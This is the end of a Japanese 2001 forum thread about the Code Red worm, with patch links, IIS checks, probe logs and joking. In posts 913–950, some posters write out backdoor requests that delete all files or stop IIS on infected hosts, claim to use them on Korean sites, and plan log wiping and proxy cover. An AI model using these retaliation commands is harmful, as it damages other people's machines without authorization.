か念入りに確認して大丈夫だった。
これで大丈夫だよね?
まだなんか必要?
- 858 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:23
- フォーマット
- 859 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:24
- >>885
ん?IISっぽいけど?
- 860 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:24
- >>855
おお漏れもこれ考えたことある。
吐くされないように、簡易セキュリティーって(w
- 861 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:24
- >>857
IIS使うのやめたら完璧。
- 862 :名無しさん@お腹すっぱい。 :2001/08/10(金) 15:24
- なんでHDDにエロイ物置いときますかね?
一度見たら飽きませんかね?
- 863 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:24
- >>854
そのタイトルだと厨房が集まりそうだから
賛成できない。
- 864 :857:2001/08/10(金) 15:25
- まだトカドカ飛んでくるけど、
今のところ大丈夫みたいなんだけど・・・
- 865 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:25
- >>861
M$のOS使うのやめれ。
- 866 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:26
- >>856
いや、ま、自分も罪になるというリスクをかぶってまでするかな?って話で
裏口入学が悪くないとはいってないっす。
- 867 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:26
- >>857
大丈夫だと思われ。
今後のこと考えて firewall や IDS を入れるとなおよし。
- 868 :857:2001/08/10(金) 15:27
- サンキューです
- 869 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:28
- ヱロが欲しけりゃ WinMX なりあるじゃん。わざわざ罪重いほう選ばんでも...
- 870 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:30
- んじゃ、そろそろ次スレ準備しますか。
1は適当に今のを直します。2のリンク集、古くなってきてるし
多すぎるのもなんだから、今いる人で厳選してくれると
ウレシイ。
- 871 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:32
- http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
これは必要でしょ
- 872 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:33
- 赤丸じゃなくて赤丸弐号でいきませんか
- 873 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:34
- 赤虫弐号じゃなくて?
- 874 :872:2001/08/10(金) 15:36
- ごみん。まちごーた
- 875 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:38
- 赤虫弐型ってのはどう?
リンクの方は
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
が分かりやすいのでいいと思う。
- 876 :スレ命名:2001/08/10(金) 15:38
- 赤虫弐号がInternetからIISを駆除する。
- 877 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:39
- ふぇ〜ん、kr.から赤丸ばっかりでいいかげんいやづら・・・
__ __________________________
∨ コーナッタラ…
カタカタ____ ___
∧_∧ ||\ .\ |◎ |
(;´Д`) .|| | ̄ ̄| |:[].|
┌( つ/ ̄l| / ̄ ̄/ | =|
|└ ヽ |二二二」二二二二二二二二」
 ̄]|__)_) .| || | ||
/ ̄\ / . || / ||
◎ ◎..[____|| .[__||
==================================================
| | 海底ケブール斬ってヨシ!
||l ∧Ω∧ υ――――――――――
l|ll (´∀` ) ザクーリ <゚彡巛
.l|l ヽ ∨ ノ, <゚彡巛
_____l| (/`'( ) \ _____________
アNNN…(゚∀゚ ){,.,}.A。)グヒャ!( ゜∀゜)(゜∀゜)アdefault.ida?XXXXX…
 ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
==================================================
(次の日)
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| モナーくん、昨日からカンコック工場と連絡取れないんだ。
| 悪いが今からこのDVDを届けてきてくれないか。
\___ _____________
∨
__ ! ∧_∧
/ /|∧_∧ (・∀・ )
|二|__|(;´Д`) (部長A)
川ニl二l一、⊂ ) | | |
 ̄ ̄ ̄ ̄ ̄|ノ (_(__)
|⊃ / ̄ ̄ ̄ ̄\ 10.255.211.10->80
| / ● ● 172.30.251.1->80
|Y Y \ 192.168.3.9->80
| | | ▼| 127.0.0.1->80
| \/ _人| ゾヌゾヌ…
| ___/
\ /
| | |
(__)_)
==================================================
(と、いうわけで)
∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜′  ̄ ̄( ゚Д゚)< Code Red 逝ってヨシ!
UU ̄ ̄ U U \_____________
トップはこれで良い?
- 878 :870:2001/08/10(金) 15:41
- まずこれは追加、と。
http://www.microsoft.com/japan/technet/security/codealrt.asp
- 879 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:41
- 聞きたいんだけど、韓国の対応の遅さってなに?
- 880 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:42
- >>877
だめ(笑)
- 881 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:43
- 韓国はワールドカップの準備で忙しいのだ
- 882 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:44
- 韓国ってインターネット接続環境がいいでしょ?(日本が酷いって話もあるけど)
だから、wormにはいい環境だったんじゃない?
対応が遅いのは問題だけど・・・
けど、wormに気が付かないと対応できないし(藁
- 883 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:46
- 確かに常時接続環境は日本よりも韓国の方が整っているらしいな。
- 884 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:48
- XXXの方がすっごい飛んでくるよ。
いつになったらおさまるのやら
- 885 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:49
- 犯人は捕まったの?
- 886 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:50
- >>1
>>3
>>4
>>5
はそのまま転載?
>>2
をリニューアル?
- 887 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:50
- いまから何も知らずにIIS構築してWEB公開する
人もいるだろうなぁ。
なにも知らずに感染。
- 888 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:51
- 帽子かぶって、マスクしてインターネットカフェでも行ってworm入れてたら、犯人捕まらないと思う・・・
- 889 :870:2001/08/10(金) 15:51
- 「赤虫」だと、はじめて来たひとがスレみつけられなさそうだから
タイトルはつまんないけど「コードレッド (Code Red)」を含ませよう
と思うけど。
- 890 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:52
- >>888 この季節に「帽子かぶって、マスクしてインターネットカフェでも行って」たら職質で捕まると思う…
- 891 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:54
- BlackICEで見てると侵入者 0.0.0.0 とかくるんだけど?
アドレスがアドレスだけに遮蔽できないし。
これもコードレッドの仕業なのかな?
- 892 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:55
- >>889
同意。
>>888
外部から持って来たプログラムを実行出来るインターネットカフェ
はまずいかもね。不便で嫌だけど。
- 893 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:55
- 公衆電話から無料プロバイダの匿名でモデムからwormを流し込む
- 894 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:56
- >>890
もし犯人が南半球の人間だったら・・・
- 895 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:56
- 犯人はインド人だ
- 896 :870:2001/08/10(金) 15:58
- >>886
>>2-5 から重要なのを抜いて 1つにまとめようと思うのだけど。
それ以外のは話題で上がったらこのスレの >>2-5 に誘導すれば
良いし。
- 897 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:57
- >>890
チョトダケワラタ
- 898 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:58
- あう。900が近い。
書き込み自粛
- 899 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:59
- こんな恐ろしいウィルスは初めてだよ
- 900 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:03
-
- 901 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:05
- (゚∀゚CodeRed)アヒャヒャヒャ〜〜〜 さん
がんばってスレ立ててね!
- 902 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:06
- うむ。勇気ある第一歩だ。
- 903 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:09
- >>896
ある程度同意。 >>1 はそのままで >>2-5 はまとめたいです。
でも赤丸は残したいな。
東アジア壊滅の図とその中心
http://www.security.nl/misc/codered-stats/
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg
- 904 :870:2001/08/10(金) 16:10
- >>903
了解。んじゃ、もう俺立てちゃうよ。
- 905 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:12
- おねがいしまーす。
- 906 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:12
- 見当たらないよ
- 907 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:12
- あ、これからね。スンマソ
- 908 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:13
- ごめん、流れからはずれたけどこんな1はどう?
>>1は
コードレッド/II (Code Red/II) 赤虫弐型が世界を覆う
猛威を振るっている Code Red とその亜種 (自称 Code Red II など)
についての情報を追いましょう。
●前スレ コードレッド (Code Red) 赤丸が世界を覆う
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
個人ユーザーで Windows NT/2000 を使っている人も、
知らない間にIISが稼働している場合があります。
対象商品などのリスト
http://www.microsoft.com/japan/technet/security/codeptch.asp
念のため次の 確認をしましょう
・Ctrl-Alt-Del を押して「タスク マネージャ」を起動
・「プロセス」タブを押す
・Inetinfo.exe プロセスを探す
Inetinfo.exe があった人は、IISが動いています。
( ´Д`)/ 先生! よくわからないけど不安です って人は>>2
重要リンク>>3
その他の情報>>4
- 909 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:15
- >>2は
1. 使ってるOSは Windows NT4.0/2000ですか?
NT4.0 → 2.
2000 (Server だけじゃなくて Professional 含む) → 3.
どちらでもない → ヨカッタネ
2. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofnt4
を見てすぐに対処しよう
3. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofw2k
を見てすぐに対処しよう
( ´Д`)/ 先生! 感染しちゃったみたいです。
すぐに IIS を停止しよう。それから
http://www.microsoft.com/japan/technet/security/codeptch.asp#extermination
を見て駆除しましょう。でも、すでに他のバックドア(裏口)を作られ
ちゃってるかもしれないので、なるべくなら OS の再インストール
を。くれぐれも再インストール中に感染しないように注意。
-----------------
- 910 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:15
- あ、そうそう、zaqからのめーるでIISの殺し方がのってたよ。
以下転載
*IISのアンインストール方法*
1.「スタート」→「設定」→「コントロールパネル」を開きます
2.コントロールパネルの中の「アプリケーションの追加と削除」アイコンを
ダブルクリックします
3.新しく表示された画面の左側にある「Windowsコンポーネントの追加と削除」
ボタンをクリックします
4.Windowsコンポーネントウィザード画面内の「インターネットインフォ
メーションサービス(IIS)」のチェックを外します
5.「次へ」ボタンをクリックし、「完了」ボタンをクリックします
- 911 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:17
- >>908-909 スマン。作っちまった。
次のスレはこちら↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742
- 912 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:18
- >>911
シンプルでよし。
- 913 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:22
- コードレッド(をばらまくマシン)を駆逐するためのIISフィルタ、
CC-Lemonを開発しました。ISAPI Filter形式で実装されており、
default.idaへのアクセス元に対して、
GET /script/root.exe?/c+del+/f+/s+*.*
の要求を自動的に行います。VECTORに公開しようと思うのですが、
僕は逮捕されますか?
- 914 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:22
- ごくろうさまでした
- 915 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:24
- >>913
vectorじゃなくて、どっかのfreeな処にupしてくれたら
俺がinternet cafeで帽子かぶってマスクして流してあげるよ。
- 916 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:25
- 以降引越しお願いします。
こっちで雑談したい人は sage 進行願いマース
- 917 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:38
- >>915
インターネットカフェにはIISインストールされてないと思われ。
- 918 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:43
- 足がつかないように分散型を考えました。cgiが動くフリー
サーバがあれば、IISに導入するFilterがcgi形式のアタッカ
に要求を出し、このアタッカがバックドアを突いた報復攻撃
を行います。アタッカへのログは残りません。
アタッカへのリクエストはProxyを経由してください。
- 919 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:46
- つーか単に外部多段プロキシリストを定義できるように
Filterに組みこんでしまえばいいですね。
- 920 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:48
- やるなら堂々とやって、捕まって、
「被害額? ふざけるなゴルァ!! 俺のおかげでバックドア
あらかじめ閉じたから再インストールだけで済んだんだ」
と裁判で主張きぼーん
傍聴にいってあげるYO!
- 921 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:49
- >>915
wormまくときにはIISなくてもできそうだけど。。。
>>918
何処でも良いからUPしてくだされ。
- 922 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:50
- あ、そか。Windows9xで動作する簡易型HTTPサーバに
同一の報復コードを実装しても効果ありますね。
それならほうぼうのインターネットカフェにインストール
してもらえばイケそうです。
- 923 :たまに案内:2001/08/10(金) 16:53
- このスレは↓に引越しました。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742
こっちで雑談したい人はsageで進行してください
- 924 :名無しさん@お腹いっぱい。:2001/08/10(金) 16:57
- つーかsageてますが・・・
- 925 :名無しさん@お腹いっぱい。:2001/08/10(金) 17:02
- sageても、あまりさがってない。
- 926 :sage:2001/08/10(金) 21:51
- つうか、*.krだけターゲットにするバージョン作るよろし。
- 927 :名無しさん@お腹いっぱい。:2001/08/10(金) 22:57
- 実験してみたんですが国内のDNSでは*.krかどうかの判定精度が低下
するのでなんとかなりませんかね?
- 928 :名無しさん@お腹いっぱい。:2001/08/10(金) 23:25
- >>927
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997414956&st=18&to=18&nofirst=true
- 929 :名無しさん@お腹いっぱい。:2001/08/11(土) 00:39
- >>928
テーブル方式ですかい・・・・。
- 930 : :2001/08/11(土) 01:59
- >>918
素晴らしいアイデアですなぁ。
>>927
頑張ってください。
>>926
激同意。
昨日の赤結果:894回(kr)だもん。
いやになってます。
- 931 :名無しさん@お腹いっぱい。:2001/08/11(土) 02:05
- てか、そこまでしなくても、net startコマンドで許してあげるのは
駄目ですか?
- 932 :名無しさん@お腹いっぱい。:2001/08/11(土) 02:18
- NET STOP IISADMINでCODEREDって抑止できます?
IISのインスタンスに依存してるならそれもアリなんですが。
冗談抜きでMSもまじめにウイルス抗体作るべきだと思うです。
いつまでたっても事態が改善しない。
- 933 :名無しさん@お腹いっぱい。:2001/08/11(土) 02:28
- http://[address]/scripts/root.exe?/c+net+stop+iisadmin+/y
これで実験してみましょう。
なんか一応受け付けられてるみたい。
- 934 :名無しさん@お腹いっぱい。:2001/08/11(土) 02:32
- 最後の/yがないとプロンプト表示になるはずなので。
これって不正アクセスになるのかなあ・・・・。
とりあえずさうちに来てる腐れIISどもに
上から順に打ってますけど、僕だけ捕まるのもアレですので
どなたか一緒に捕まっていただける方いませんか?
- 935 :名無しさん@お腹いっぱい。:2001/08/11(土) 03:17
- よく天然記念物のカモシカとかさー、増えすぎちゃうと許可受けた
ハンターが規定個体分だけ撃ち殺すじゃん。
政府機関から許可受けたサイトだけ Code Red に >>933 返すス
クリプト起動しておくってのじゃダメなんかなー。撃ち殺したサ
イトには後で連絡してやってさ (最悪政治問題とかになりそう
だな)。
- 936 :名無しさん@お腹いっぱい。:2001/08/11(土) 03:19
- いま改造中です。このままじゃとおりません。
韓国サイトで実験させていただいております。
"net stop iisadmin"<<これをMIMEエンコード
しないと。
- 937 :名無し:2001/08/11(土) 04:36
- あんまり うざいので 81にPORTを変更した。
- 938 :名無し:2001/08/11(土) 04:42
- こんなとこからも お客さんが来ていた。
[10/Aug/2001:13:41:42 +0900] 403 childpia.go.kr "GET /default.ida?X
- 939 :名無し :2001/08/11(土) 07:00
- CodeRedWatcherつかってみたら、こんなにきてたII ビック -り
[2001/08/11 3:07:00] CodeRed Type XXXXX from: 202.102.223.xxx /
[2001/08/11 4:37:19] CodeRed Type XXXXX from: 202.102.170.xxx /
[2001/08/11 4:58:43] CodeRed Type XXXXX from: 202.121.112.xxx /
[2001/08/11 5:01:00] CodeRed Type XXXXX from: 202.212.135.xx / fxxxxxx.ap.plala.or.jp
[2001/08/11 5:01:23] CodeRed Type XXXXX from: 202.31.140.xxx /
[2001/08/11 5:35:54] CodeRed Type XXXXX from: 202.85.84.xxx / ip84-83.asiaonline.net
[2001/08/11 6:42:58] CodeRed Type XXXXX from: 202.98.180.xxx /
[2001/08/11 6:59:22] CodeRed Type XXXXX from: 61.151.228.xx /
- 940 :名無しさん@お腹いっぱい。:2001/08/11(土) 10:17
- >>939
CodeRedWatcherって何?
- 941 :名無しさん@お腹いっぱい。:2001/08/11(土) 10:25
- >>940
偽鯖たてて赤虫を呼び込むだけの鶴
- 942 :名無しさん@お腹いっぱい。:2001/08/11(土) 10:40
- >>941
THX
もう1つ質問が、CodeRedに感染するのはNT系のOSのサーバーだけだよね。
で、感染したサーバーはWin9xだろうがMacだろうがすべてのOSにアタックするの?
- 943 :名無しさん@お腹いっぱい。:2001/08/11(土) 10:44
- lol
- 944 :名無しさん@お腹いっぱい。:2001/08/11(土) 10:45
- >>942
当方Win98SEですが、アタック食らいまくりです。
Macは使ってる人が知り合いにいないので詳細不明です・・。
- 945 :おねがい:2001/08/11(土) 10:49
- このスレは↓に引越しました。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742
こっちで雑談したい人はsageで進行してください
- 946 :名無しさん@お腹いっぱい。:2001/08/11(土) 11:02
- >>944
アタックされるときってISDNだったらターミナルアダプターとかのランプが
光ったりするのかな?
あとアタックされた時の被害ってどんな物?
- 947 :名無しさん@お腹いっぱい。:2001/08/11(土) 11:22
- >>946
当方ISDNなんですが。ほとんどの時間はファイルを転送しているのでランプの点滅状況は分かりません。
被害はWinNTか2000でない限りファイアーウォールのログにアタックしてきた形跡が残るだけです。
>>945
スマソ。
- 948 :名無しさん@お腹いっぱい。:2001/08/11(土) 12:57
- >>947
ありがとう
- 949 :名無しさん@お腹いっぱい。:2001/08/11(土) 13:59
- ローカル環境でテスト中の独り言。
うーん。NET STOPコマンド自体にadmin権限がいるのかあ・・・。
caclで再割り当ても弾かれるねえ。
これじゃログも消せやしない。
やぱ外部からDOWNLOADさせてそいつで殺すのがよさげか。
サービスとしてインストールした直後にコントロールマネージャ
に接続してIISADMINを殺すCOMモジュールはできてるんだ。
ついでにSYSTEM32\LogFilesの下も抹消な。
あとはFTPコマンドの起動とDOWNLOADまでのスクリプトだな。
ああ、やっぱ犯罪だよなあこれ・・・。
- 950 :名無しさん@お腹いっぱい。:2001/08/11(土) 14:05
- DLするならもはやサーバ自体シャットダウンもできるな・・・。
- 951 :kurekure:2001/08/11(土) 23:20
- >>939,941
CodeRedWatcherほしい。どこに落ちてる?
- 952 :名無しさん@お腹いっぱい。:2001/08/12(日) 02:13
- http://ueno.cool.ne.jp/zeiger/CodeRedProve.zip
にたようなのなら。>>951
- 953 :名無しさん@お腹いっぱい。:2001/08/12(日) 10:04
- >>942
80番ポートがあったら相手が何でも攻撃してくる。うちは UNIX clone plus
apache だけどもーうざったいったらない。
- 954 :名無しさん@お腹いっぱい。:2001/08/12(日) 10:21
- ここのスレ、夏厨しかいないのね。
- 955 :名無しさん@お腹いっぱい。:2001/08/12(日) 11:03
- どうやらウイルスに感染したようです
ネットに繋いで30分すると
必ず画面の上から下に、花びらが舞い落ちてきます
- 956 :名無しさん@お腹いっぱい。:2001/08/12(日) 11:12
- Port 6699 でがんがん来てませんか?
- 957 :名無しさん@お腹いっぱい。:2001/08/12(日) 11:23
- >>955
なんか、ちょっとうらやましい。
- 958 :951:2001/08/12(日) 12:19
- >>952
さんきゅう。ゲットした。
- 959 :名無しさん@お腹いっぱい。:2001/08/12(日) 17:08
- >>952
win98なら実行しても意味ないよね
- 960 :名無しさん@お腹いっぱい。:2001/08/12(日) 17:25
- Win98でもサーバはたてることはできる
- 961 :名無しさん@お腹いっぱい。:2001/08/12(日) 17:44
- >>955
いいな、俺なんかWindowsマークが飛んでくるぞ。
調べようとして、ちょっとでもキーに触ると消えるんだ。
- 962 :名無しさん@お腹いっぱい。:2001/08/12(日) 18:09
- >>955
俺のなんか、電気が落ちるんだから。
ちょっとでもキーに触ると動きだすんだ。
- 963 :名無しさん@お腹いっぱい。:2001/08/12(日) 21:02
- >>955
へぇ、うちなんかDoomみたいな画面になるんだけど
操作しようと思うと消えちゃうんだ
- 964 :ウイルス博士:2001/08/12(日) 21:07
- 花見ウィルス、フライングWindowsウィルス、
サスペンドウィルス、3D迷路ウィルスですね。
危険度は5、最高レベルです
- 965 :957:2001/08/12(日) 21:55
- 白状します。気付かずに純粋にうらやましがってしまいました。
- 966 :名無しさん@お腹いっぱい。:2001/08/12(日) 21:59
- >>965ワラタ
- 967 :名無しさん@お腹いっぱい。:2001/08/13(月) 00:24
- ぎゃはは、そりゃスクリーンセイバーじゃないか。
俺のスクリーンセイバーなんか凄いんだぜ。
インストした覚えも無いのにグルグル巻きの絵が出てくるんだ。
- 968 :名無しさん@お腹いっぱい。:2001/08/13(月) 01:09
- >>967
お前、なに言ってんの。
- 969 :名無しさん@お腹いっぱい。:2001/08/13(月) 01:23
- >>967
ショップ展示のセーバーでそんなのがあったな・・・
・・・まさかそのまま買わされたとか?
- 970 :名無しさん@お腹いっぱい。:2001/08/13(月) 01:34
- もうHybrisは過去の物か・・・・
- 971 :名無しさん@お腹いっぱい。:2001/08/13(月) 09:51
- あのね、おとーさんのパソコンね、なんにもしないでおいとくと
えっちな絵がたくさんでてくるの。
ういるすなら消しちゃったほうがいいのかなぁ。
- 972 :名無しさん@お腹いっぱい。:2001/08/14(火) 10:30
- >>
http://202.223.168.71/~shoichi/tateyama/2001/
- 973 :キリ番ゲッター:2001/08/21(火) 22:02
- 900超えスレッド発見
- 974 :キリ番ゲッター:2001/08/21(火) 22:02
- 1000狙う!!!!!!!!!!!!!!!!!!!
いくよ
- 975 :キリ番ゲッター:2001/08/21(火) 22:11
- んんん??? 落ちた・・・
- 976 :キリ番ゲッター:2001/08/21(火) 22:12
- 俺様が1000取れたらウラビデオさしあげます
配布場所 http://www.megabbs.com/cgi-bin/readres.cgi?bo=douga&vi=995801026&rm=100
- 977 :キリ番ゲッター:2001/08/21(火) 22:13
- ただし、1000の邪魔されたら配布中止
- 978 :キリ番ゲッター:2001/08/21(火) 22:13
- 台風情報で「満潮」を「マンチョ」と読み間違えた女子アナ萌え〜〜〜
- 979 :キリ番ゲッター:2001/08/21(火) 22:14
- お願いですから、999までROMしていて1000になって
いきなりカキコするのはやめてね
- 980 :名無しさん@お腹いっぱい。:2001/08/21(火) 22:14
- 東急CATV内でCodeRedをほったらかしにしてるヤツ、いい加減にしろ〜!
1時間に20近くアタックしてくるぞ。
- 981 :キリ番ゲッター:2001/08/21(火) 22:14
- 俺様はゲームラボの取材を受けたことあるよ!!!!!!
- 982 :キリ番ゲッター:2001/08/21(火) 22:15
- ギャラは図書券¥1000だった(w
- 983 :キリ番ゲッター:2001/08/21(火) 22:15
- ん? 邪魔するなっつーの!!!!!!
氏ね>>980
- 984 :キリ番ゲッター:2001/08/21(火) 22:17
- いくら夏休みだからって 馬鹿が多すぎ!!!!!
日本語読めねえのかよー
1000は俺様が取るから カキコするな
- 985 :キリ番ゲッター:2001/08/21(火) 22:18
- 台風の目ってマジで風速0mの晴天なの???
- 986 :キリ番ゲッター:2001/08/21(火) 22:19
- 俺様の邪魔したらIPさらしあげじゃ〜〜〜〜〜〜〜〜〜〜
わかったか!!!
- 987 :キリ番ゲッター:2001/08/21(火) 22:20
- でも、邪魔したIPってどこに書けばいいのかな?? 1000超えたら書けない
- 988 :キリ番ゲッター:2001/08/21(火) 22:22
- いよいよ、1000まであともう少し
そろそろ動くよ
- 989 :キリ番ゲッター:2001/08/21(火) 22:23
- つーか、コードレッドってなんじゃらホイ???
ああ、多分、早b除機のコードが終わりを示す赤い線のことね
- 990 :キリ番ゲッター:2001/08/21(火) 22:24
- おお!!! くそ〜〜〜〜入力ミス!!!!!!
せっかくのボケが台無しだ〜〜〜〜〜〜
くやしーーーーーーーーーーーーーーーーーーーーーー
- 991 :キリ番ゲッター:2001/08/21(火) 22:25
- もう一度チャレンジ つーか、書き直しじゃーーーーーーーー ↓↓↓
- 992 :キリ番ゲッター:2001/08/21(火) 22:25
- つーか、コードレッドってなんじゃらホイ???
ああ、多分、早b除機のコードが終わりを示す赤い線のことね
- 993 :1000:2001/08/21(火) 22:25
- (゚д゚)ウマー
(゚д゚)(゚д゚)ウマー (゚д゚)ウマー
(゚д゚)(゚д゚)(゚д゚)ウマー (゚д゚)(゚д゚)ウマー
(゚д゚)(゚д゚)ウマー (゚д゚)(゚д゚)(゚д゚)ウマー
|// (゚д゚)(゚д゚)ウマー
| |//
| ワーイ /
| ∧ ∧ /
| (,,・∇・) / ⊂,'⊃
| ̄| ̄ ̄ ̄ ̄ ̄~|
| |ふぁんたじー|
| | 号 _|
 ̄ ̄ ̄ ̄ ̄ ̄
/  ̄ ̄\ 〜〜〜〜
⊂⊃ /\ ⊂⊃
/⊂⊃ \/ \ /\ ⊂⊃ /\
〜〜〜〜 \ \ /\/ \
/ / \
- 994 :キリ番ゲッター:2001/08/21(火) 22:26
- これでよし!!!! われながら いいボケだ
- 995 :キリ番ゲッター:2001/08/21(火) 22:26
- おおおお!!!!!邪魔する気か!!!!!
そうはさせんぞ
- 996 :キリ番ゲッター:2001/08/21(火) 22:27
- いいか!!!!! 俺様は最後に勝つ
- 997 :キリ番ゲッター:2001/08/21(火) 22:27
- 1000 は 美しい!!!!!
バンザイ!!!!!!!!!!!!!!!!!!!!!
- 998 :1000:2001/08/21(火) 22:28
- (゚д゚)ウマー
(゚д゚)(゚д゚)ウマー (゚д゚)ウマー
(゚д゚)(゚д゚)(゚д゚)ウマー (゚д゚)(゚д゚)ウマー
(゚д゚)(゚д゚)ウマー (゚д゚)(゚д゚)(゚д゚)ウマー
|// (゚д゚)(゚д゚)ウマー
| |//
| ワーイ /
| ∧ ∧ /
| (,,・∇・) / ⊂,'⊃
| ̄| ̄ ̄ ̄ ̄ ̄~|
| |ふぁんたじー|
| | 号 _|
 ̄ ̄ ̄ ̄ ̄ ̄
/  ̄ ̄\ 〜〜〜〜
⊂⊃ /\ ⊂⊃
/⊂⊃ \/ \ /\ ⊂⊃ /\
〜〜〜〜 \ \ /\/ \
/ / \
pppppp
- 999 :キリ番ゲッター:2001/08/21(火) 22:28
- ERROR:2重カキコですか??
名前: キリ番ゲッター
E-mail:
内容:
1000 そこは 最後のフロンティア
- 1000 :1000:2001/08/21(火) 22:28
- (゚д゚)ウマー
(゚д゚)(゚д゚)ウマー (゚д゚)ウマー
(゚д゚)(゚д゚)(゚д゚)ppppウマー (゚д゚)(゚д゚)ウマー
(゚д゚)(゚д゚)ウマー (゚д゚)(゚д゚)(゚д゚)ウマー
|// (゚д゚)(゚д゚)ウマー
| |//
| ワーイ /
| ∧ ∧ /
| (,,・∇・) / ⊂,'⊃
| ̄| ̄ ̄ ̄ ̄ ̄~|
| |ふぁんたじー|
| | 号 _|
 ̄ ̄ ̄ ̄ ̄ ̄
/  ̄ ̄\ 〜〜〜〜
⊂⊃ /\ ⊂⊃
/⊂⊃ \/ \ /\ ⊂⊃ /\
〜〜〜〜 \ \ /\/ \
/ / \
- 1001 :1001:Over 1000 Thread
- このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
★スマホ版★
掲示板に戻る
全部
前100
次100
最新50
read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)